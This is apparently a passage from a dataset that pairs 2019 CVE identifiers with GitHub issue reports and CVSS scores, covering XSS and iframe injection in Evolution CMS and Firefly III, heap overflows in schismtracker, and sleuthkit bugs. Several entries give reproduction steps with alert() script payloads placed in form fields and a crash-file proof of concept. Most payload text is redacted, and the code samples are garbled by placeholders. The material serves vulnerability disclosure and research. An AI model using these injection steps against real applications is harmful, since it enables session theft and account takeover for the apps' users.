  37318. "description": "Stored Cross Site Scripting. Stored Cross Site Scripting Vulnerability Risk Description Stored cross site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious APITAG code into the application, which will execute within the browser of any user who views the relevant application content. The attacker supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes. Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out of band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application). Stored cross site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations, this can be used to create web application worms that spread exponentially and ultimately exploit all active users. POC: Let's see welcome before login FILETAG Login to the Application FILETAG Go to the Template Location and add new template FILETAG add xss payload in description and new category location using APITAG APITAG FILETAG Save and exit the template location will get xss popup FILETAG Mitigation: Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. 
Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. 
Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG }",
  37319. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37320. "severity": "MEDIUM",
  37321. "baseScore": 5.4,
  37322. "impactScore": 2.7,
  37323. "exploitabilityScore": 2.3
  37324. },
  37325. {
  37326. "CVE_ID": "CVE-2019-14518",
  37327. "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1043",
  37328. "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1043",
  37329. "Repo_new": "evolution-cms/evolution",
  37330. "Issue_Created_At": "2019-03-22T15:07:24Z",
  37331. "description": "Reflected XSS Vulnerability. Reflected XSS Vulnerability Description: The second and the most common type of XSS is Reflected XSS APITAG persistent XSS). In this case, the attacker\u2019s payload has to be a part of the request that is sent to the web server. It is then reflected back in such a way that the HTTP response includes the payload from the HTTP request. Attackers use malicious links, phishing emails, and other social engineering techniques to lure the victim into making a request to the server. The reflected XSS payload is then executed in the user\u2019s browser. Reflected XSS is not a persistent attack, so the attacker needs to deliver the payload to each victim. These attacks are often made using social networks. Login to application FILETAG Goto the Document Manager and view the list of documents FILETAG there is a search perimeter insert xss payload as APITAG APITAG FILETAG Effected URL URLTAG FILETAG Mitigation: Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. 
Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. 
Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG } While the issue was investigated, there were some backend updates done which apparently automatically mysteriously fixed the issue.",
  37332. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37333. "severity": "MEDIUM",
  37334. "baseScore": 5.4,
  37335. "impactScore": 2.7,
  37336. "exploitabilityScore": 2.3
  37337. },
  37338. {
  37339. "CVE_ID": "CVE-2019-14518",
  37340. "Issue_Url_old": "https://github.com/evolution-cms/evolution/issues/1042",
  37341. "Issue_Url_new": "https://github.com/evolution-cms/evolution/issues/1042",
  37342. "Repo_new": "evolution-cms/evolution",
  37343. "Issue_Created_At": "2019-03-22T14:41:23Z",
  37344. "description": "I Frame Injection Vulnerability. I Frame Injection Vulnerability Risk Description Malware Attackers use this APITAG and include the malware websites. They are able to include the webpage one pixel square APITAG won\u2019t able to see it in webpage). Obfuscate the APITAG that will run automatically from that included page so that it looks something like NUMBERTAG C NUMBERTAG D NUMBERTAG F \u2013 leaving no obvious clue that it\u2019s malicious. Using Iframe Injection, an attacker can inject advertisements inside any other websites, insert malware infected site links, redirect to malware infected sites and more. POC Login to Evolution CMS application FILETAG Goto the template location and try to create New template FILETAG insert the payload in description location, template name as \"/> APITAG APITAG FILETAG save and close the template. FILETAG Now open the template list like below you will get Iframe which is running malicious. FILETAG Mitigation NUMBERTAG you should include the Content Security Policy frame ancestors header in your HTTP response to prevent your website being loaded in a frame. Some older browsers may not have support for this header, so also use the X Frame Options header with value DENY, SAMEORIGIN or ALLOW FROM uri. X Frame Options takes precedence over CSP frame ancestors in some browsers NUMBERTAG You could additionally have some Javascript \"frame breaker\" code that will prevent your website from being \"framed\" in older browsers. \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Output encoding: It is recommended to implement \u2018output encoding\u2019 to convert untrusted input into a safe form where the input is displayed as data to the user without executing as code in the browser. 
Java HTML encoding Function public static String APITAG APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG result = new APITAG \u00a0\u00a0\u00a0\u00a0 final APITAG iterator = new \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 char character =\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0 while (character != APITAG ) \u00a0\u00a0\u00a0\u00a0 { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 if (character == ' APITAG ') APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else if (character == ' ')\u00a0 APITAG NUMBERTAG else if (character == '\\ ) APITAG NUMBERTAG else if (character == '&')\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 else { \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //the char is not a special one \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 //add it to the result as is \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 APITAG \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 character = APITAG \u00a0\u00a0\u00a0\u00a0 } \u00a0\u00a0\u00a0\u00a0 return APITAG \u00a0 } \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Escaping: Escape all untrusted data based on the HTML context (body, attribute, APITAG CSS, or URL) that the data will be placed into. EASPI API String safe = APITAG APITAG \"input\" ) ); \u00a0 \u2022\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Filtering input parameter: Positive or \"whitelist\" input validation with appropriate canonicalization is the recommended filtering technique. Alternatively, black list filtering input works by removing some or all special characters from your input. Special characters are characters that enable script to be generated within an HTML stream. 
Special characters include the following: APITAG \" ' % ; ) ( & + APITAG Codefunction APITAG { \u00a0\u00a0\u00a0 APITAG = APITAG PATHTAG \\| PATHTAG (\\|\\) PATHTAG ); \u00a0\u00a0\u00a0 return APITAG }",
  37345. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37346. "severity": "MEDIUM",
  37347. "baseScore": 5.4,
  37348. "impactScore": 2.7,
  37349. "exploitabilityScore": 2.3
  37350. },
  37351. {
  37352. "CVE_ID": "CVE-2019-14523",
  37353. "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/202",
  37354. "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/202",
  37355. "Repo_new": "schismtracker/schismtracker",
  37356. "Issue_Created_At": "2019-08-01T14:40:50Z",
  37357. "description": "Heap Overflow while parsing Amiga Oktalyzer files. Hey schismtracker team, I would like to report a security vulnerability in Amiga Oktalyzer parser (fmt/okt.c). There is a heap overflow in the way the parser handles Song's orderlist in Amiga Oktalyzer file format. The fmt_okt_load_song function, takes the NUMBERTAG bytes long length (plen) of the song orderlist directly from the file. At the end of the function, it tries to memset the structure; however, the size of the memset is calculated by subtracting the plen from MAX_ORDERS NUMBERTAG As a consequence, if a file is created with a plen bigger than MAX_ORDER NUMBERTAG it will underflow and become a big unsigned integer that will make memset write beyond the buffer's boundaries. int fmt_okt_load_song(song_t song, slurp_t fp, unsigned int lflags) { int plen NUMBERTAG how many positions in the orderlist are valid while (!slurp_eof(fp)) { uint NUMBERTAG t blklen; // length of this block size_t nextpos; // ... and start of next one slurp_read(fp, tag NUMBERTAG slurp_read(fp, &blklen NUMBERTAG blklen = APITAG nextpos = slurp_tell(fp) + blklen; [...] switch (OKT_BLOCK(tag NUMBERTAG tag NUMBERTAG tag NUMBERTAG tag NUMBERTAG case OKT_BLK_PLEN: if (!(readflags & OKT_HAS_PLEN)) { readflags |= OKT_HAS_PLEN; slurp_read(fp, &w NUMBERTAG plen = APITAG } [...] song >pan_separation NUMBERTAG memset(song >orderlist + plen, ORDER_LAST, MAX_ORDERS plen NUMBERTAG Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
  37358. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37359. "severity": "HIGH",
  37360. "baseScore": 7.8,
  37361. "impactScore": 5.9,
  37362. "exploitabilityScore": 1.8
  37363. },
  37364. {
  37365. "CVE_ID": "CVE-2019-14524",
  37366. "Issue_Url_old": "https://github.com/schismtracker/schismtracker/issues/201",
  37367. "Issue_Url_new": "https://github.com/schismtracker/schismtracker/issues/201",
  37368. "Repo_new": "schismtracker/schismtracker",
  37369. "Issue_Created_At": "2019-08-01T14:12:19Z",
  37370. "description": "Heap Overflow on parsing MTM. Hey schismtracker team, I would like to report a security vulnerability in schismtracker MTM parser (fmt/mtm.c). There is a potential heap overflow in the way schismtracker parses MTM files, specifically while working with song patterns. On fmt_mtm_load_song, it takes the number of patterns from the file in line NUMBERTAG npat = slurp_getc(fp); And later in code, there is a loop that fills the song patterns and patterns_size that is defined as: define MAX_PATTERNS NUMBERTAG song_note_t patterns[MAX_PATTERNS]; // Patterns uint NUMBERTAG t pattern_size[MAX_PATTERNS]; // Pattern Lengths The loop takes the value of npat directly; this is a one byte long field whose maximum value can hold up to NUMBERTAG entries. / patterns / for (pat NUMBERTAG pat APITAG patterns[pat] = APITAG NUMBERTAG song >pattern_size[pat] = song >pattern_alloc_size[pat NUMBERTAG tracknote = trackdata[n]; Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
  37371. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  37372. "severity": "HIGH",
  37373. "baseScore": 7.8,
  37374. "impactScore": 5.9,
  37375. "exploitabilityScore": 1.8
  37376. },
  37377. {
  37378. "CVE_ID": "CVE-2019-14525",
  37379. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5753",
  37380. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5753",
  37381. "Repo_new": "octopusdeploy/issues",
  37382. "Issue_Created_At": "2019-08-02T02:16:28Z",
  37383. "description": "Fix some sensitive value handling in the server config API/portal UI. The bug A couple of values aren't being correctly handled as sensitive on one of the server configuration APIs/pages. Relates to APITAG NUMBERTAG",
  37384. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  37385. "severity": "MEDIUM",
  37386. "baseScore": 4.9,
  37387. "impactScore": 3.6,
  37388. "exploitabilityScore": 1.2
  37389. },
  37390. {
  37391. "CVE_ID": "CVE-2019-14525",
  37392. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/5754",
  37393. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/5754",
  37394. "Repo_new": "octopusdeploy/issues",
  37395. "Issue_Created_At": "2019-08-02T02:34:17Z",
  37396. "description": "Fix some sensitive value handling in the server config API/portal UI. The bug A couple of values aren't being correctly handled as sensitive on one of the server configuration APIs/pages. Relates to APITAG NUMBERTAG",
  37397. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
  37398. "severity": "MEDIUM",
  37399. "baseScore": 4.9,
  37400. "impactScore": 3.6,
  37401. "exploitabilityScore": 1.2
  37402. },
  37403. {
  37404. "CVE_ID": "CVE-2019-14531",
  37405. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1576",
  37406. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1576",
  37407. "Repo_new": "sleuthkit/sleuthkit",
  37408. "Issue_Created_At": "2019-07-22T16:53:19Z",
  37409. "description": "Out of Bounds read in ISO NUMBERTAG Dear sleuthkit team, I would like to report a security vulnerability in APITAG There is an out of bound read on iso NUMBERTAG while parsing System Use Sharing Protocol data. On the parse_susp function, while parsing an ER entry, it will try to read the different Extension strings. However, there is no control of the size fields and they will read out of the buf size bound. else if ((head >sig FILETAG",
  37410. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37411. "severity": "CRITICAL",
  37412. "baseScore": 9.8,
  37413. "impactScore": 5.9,
  37414. "exploitabilityScore": 3.9
  37415. },
  37416. {
  37417. "CVE_ID": "CVE-2019-14532",
  37418. "Issue_Url_old": "https://github.com/sleuthkit/sleuthkit/issues/1575",
  37419. "Issue_Url_new": "https://github.com/sleuthkit/sleuthkit/issues/1575",
  37420. "Repo_new": "sleuthkit/sleuthkit",
  37421. "Issue_Created_At": "2019-07-22T16:28:14Z",
  37422. "description": "Off by One Underflow on hfind. Dear sleuthkit team, I would like to report a security vulnerability in APITAG There is an off by one overwrite due to an underflow on hfind.cpp while using a bogus hash table. On the main function, when a hash table is used, it read the first line and try to remove the newline character, however, if a bogus hash file is used with a NULL as the first character, the fgets will work however when it try to clean the new line using strlen(buf), it will return zero and as a consequence a zero will be written at the position buf NUMBERTAG int main(int argc, char arg NUMBERTAG int ch; TSK_TCHAR idx_type = NULL; TSK_TCHAR db_file = NULL; [..] char buf NUMBERTAG if (NULL == fgets(buf NUMBERTAG handle)) { break; } endif \u00a0 / Remove the newline / buf[strlen(buf NUMBERTAG A simple proof of concept consists of using a hash lookup file with NULL as the first character: $ hfind f boom.hex any.db PATHTAG hexdump /tmp/boom.he NUMBERTAG aa NUMBERTAG aaaa aaaa aaaa aaaa aaaa aaaa aaaa NUMBERTAG aaaa aaaa aaaa aaaa aaaa aaaa aaaa aaaa NUMBERTAG aaaa aaaa NUMBERTAG aa The exact line could be found here: URLTAG Please let me know when you have fixed the vulnerability so that I can coordinate my disclosure with yours. For reference, here is a link to Semmle's vulnerability disclosure policy: URLTAG Thank you, Nico Waisman Semmle Security Research Team",
  37423. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37424. "severity": "CRITICAL",
  37425. "baseScore": 9.8,
  37426. "impactScore": 5.9,
  37427. "exploitabilityScore": 3.9
  37428. },
  37429. {
  37430. "CVE_ID": "CVE-2019-14540",
  37431. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2449",
  37432. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2449",
  37433. "Repo_new": "fasterxml/jackson-databind",
  37434. "Issue_Created_At": "2019-09-10T17:06:52Z",
  37435. "description": "Block one more gadget type (no CVE allocated yet). Similar to other Unbounded Polymorphic Type (default typing, usually) vulnerabilities, a new report that is loosely related to (already blocked) type APITAG has been received. This is a placeholder for now, more details will be added once vulnerability has been evaluated and, if found applicable, fixed.",
  37436. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37437. "severity": "CRITICAL",
  37438. "baseScore": 9.8,
  37439. "impactScore": 5.9,
  37440. "exploitabilityScore": 3.9
  37441. },
  37442. {
  37443. "CVE_ID": "CVE-2019-14540",
  37444. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2410",
  37445. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2410",
  37446. "Repo_new": "fasterxml/jackson-databind",
  37447. "Issue_Created_At": "2019-08-06T02:03:28Z",
  37448. "description": "Block one more gadget type ( CVETAG ). Hey, buddy. I found a new gadget can be used to exploit jackson which can cause RCE. I had sent the report to EMAILTAG .",
  37449. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37450. "severity": "CRITICAL",
  37451. "baseScore": 9.8,
  37452. "impactScore": 5.9,
  37453. "exploitabilityScore": 3.9
  37454. },
  37455. {
  37456. "CVE_ID": "CVE-2019-14544",
  37457. "Issue_Url_old": "https://github.com/gogs/gogs/issues/5764",
  37458. "Issue_Url_new": "https://github.com/gogs/gogs/issues/5764",
  37459. "Repo_new": "gogs/gogs",
  37460. "Issue_Created_At": "2019-08-01T11:59:15Z",
  37461. "description": "Incorrect access control. Gogs version (or commit ref): newest(e NUMBERTAG Can you reproduce the bug at FILETAG Yes I discovered a misconfigured access control in the newest gogs, I think it's some kind of bug. Can you confirm u APITAG is still the best email to send more details? Best, Manasseh Zhou MENTIONTAG",
  37462. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  37463. "severity": "CRITICAL",
  37464. "baseScore": 9.8,
  37465. "impactScore": 5.9,
  37466. "exploitabilityScore": 3.9
  37467. },
  37468. {
  37469. "CVE_ID": "CVE-2019-14546",
  37470. "Issue_Url_old": "https://github.com/espocrm/espocrm/issues/1369",
  37471. "Issue_Url_new": "https://github.com/espocrm/espocrm/issues/1369",
  37472. "Repo_new": "espocrm/espocrm",
  37473. "Issue_Created_At": "2019-07-29T15:31:19Z",
  37474. "description": "Stored XSS to Complete Account Takeover. Hello Team, I found a Stored XSS on an endpoint and with that I'm able to takeover any account possible. Its a bit of a lengthy report, should I write here or mail to some id for privacy. If possible could you set up a meeting so that I explain you the whole process.",
  37475. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37476. "severity": "MEDIUM",
  37477. "baseScore": 5.4,
  37478. "impactScore": 2.7,
  37479. "exploitabilityScore": 2.3
  37480. },
  37481. {
  37482. "CVE_ID": "CVE-2019-14653",
  37483. "Issue_Url_old": "https://github.com/pandao/editor.md/issues/715",
  37484. "Issue_Url_new": "https://github.com/pandao/editor.md/issues/715",
  37485. "Repo_new": "pandao/editor.md",
  37486. "Issue_Created_At": "2019-08-02T08:05:43Z",
  37487. "description": "XSS vulnerability on APITAG and APITAG .. Summary Because there are no attribute filters in the abbr and sup tags, an attacker can trigger XSS on websites which is using FILETAG . CVE Will be assigned soon. Payloads This will execute APITAG when you move the mouse on any part of the page. CODETAG Images APITAG",
  37488. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37489. "severity": "MEDIUM",
  37490. "baseScore": 6.1,
  37491. "impactScore": 2.7,
  37492. "exploitabilityScore": 2.8
  37493. },
  37494. {
  37495. "CVE_ID": "CVE-2019-14667",
  37496. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2363",
  37497. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2363",
  37498. "Repo_new": "firefly-iii/firefly-iii",
  37499. "Issue_Created_At": "2019-08-02T09:26:36Z",
  37500. "description": "Multiple Stored XSS in convert transactions.. Description Current version of Firefly III Version NUMBERTAG is vulnerable to multiple stored XSS due to lack of filtration of user supplied data in transaction description field and in asset account name. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit links below. Steps to reproduce NUMBERTAG Add NUMBERTAG asset accounts with names \" APITAG alert(\"XSS in source asset account\") APITAG \", \" APITAG alert(\"XSS in destination asset account\") APITAG NUMBERTAG Add new transaction with description \" APITAG alert(\"XSS in transaction description\") APITAG \". You can add new deposit or withdrawal or transfer NUMBERTAG isit CODETAG See NUMBERTAG alerts (one description alert, two source account alerts, two destination account alerts). POC image FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37501. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  37502. "severity": "MEDIUM",
  37503. "baseScore": 6.1,
  37504. "impactScore": 2.7,
  37505. "exploitabilityScore": 2.8
  37506. },
  37507. {
  37508. "CVE_ID": "CVE-2019-14668",
  37509. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2364",
  37510. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2364",
  37511. "Repo_new": "firefly-iii/firefly-iii",
  37512. "Issue_Created_At": "2019-08-02T09:40:51Z",
  37513. "description": "Stored XSS in delete link transactions. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in transaction description field. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit links below. Steps to reproduce NUMBERTAG Add NUMBERTAG new transactions with description \" APITAG alert(\"XSS in transaction description\"); APITAG \" and \" APITAG alert(\"XSS in transaction description NUMBERTAG APITAG NUMBERTAG Link them together NUMBERTAG isit APITAG You can navigate there from transaction menu. See NUMBERTAG alerts (two first transaction description payloads, two second transaction description payloads) POC Image FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37514. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37515. "severity": "MEDIUM",
  37516. "baseScore": 5.4,
  37517. "impactScore": 2.7,
  37518. "exploitabilityScore": 2.3
  37519. },
  37520. {
  37521. "CVE_ID": "CVE-2019-14669",
  37522. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2366",
  37523. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2366",
  37524. "Repo_new": "firefly-iii/firefly-iii",
  37525. "Issue_Created_At": "2019-08-02T10:08:18Z",
  37526. "description": "Stored XSS in reports/audit. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in asset account name. Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Add two assets accounts with names \" APITAG alert(\"account with no activity\"); APITAG \" and \" APITAG alert(\"active account\"); APITAG NUMBERTAG Do some activity with active account NUMBERTAG isit PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37527. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37528. "severity": "MEDIUM",
  37529. "baseScore": 5.4,
  37530. "impactScore": 2.7,
  37531. "exploitabilityScore": 2.3
  37532. },
  37533. {
  37534. "CVE_ID": "CVE-2019-14670",
  37535. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2365",
  37536. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2365",
  37537. "Repo_new": "firefly-iii/firefly-iii",
  37538. "Issue_Created_At": "2019-08-02T09:48:29Z",
  37539. "description": "Stored XSS in create from bill rule. . Description Current version of Firefly III Version NUMBERTAG is vulnerable to stored XSS due to lack of filtration of user supplied data in bill name field Malicious attacker can create specially crafted request, which contains javascript code in it. Malicious javascript code will be executed when user visit link below. Steps to reproduce NUMBERTAG Add new bill with name \" APITAG alert(\"XSS in bill rule\") APITAG NUMBERTAG isit PATHTAG FILETAG Extra info Tested on Mozilla NUMBERTAG esr NUMBERTAG bit)",
  37540. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  37541. "severity": "MEDIUM",
  37542. "baseScore": 5.4,
  37543. "impactScore": 2.7,
  37544. "exploitabilityScore": 2.3
  37545. },
  37546. {
  37547. "CVE_ID": "CVE-2019-14671",
  37548. "Issue_Url_old": "https://github.com/firefly-iii/firefly-iii/issues/2367",
  37549. "Issue_Url_new": "https://github.com/firefly-iii/firefly-iii/issues/2367",
  37550. "Repo_new": "firefly-iii/firefly-iii",
  37551. "Issue_Created_At": "2019-08-02T11:30:27Z",
  37552. "description": "Local file enumeration vulnerability. . Bug description Current version of Firefly III Version NUMBERTAG is vulnerable to local files enumeration. Steps to reproduce NUMBERTAG isit APITAG NUMBERTAG Send that request: ERRORTAG You will be redirected to URLTAG where you can see ERRORTAG Send request above again with PATHTAG you will see ERRORTAG NUMBERTAG Error codes are different, and malicious attacker can use it to gain information about local file system, enumerate files and paths, bruteforce file structure. That issue appeared because you use libcurl, without proper protocol sanitizing.",
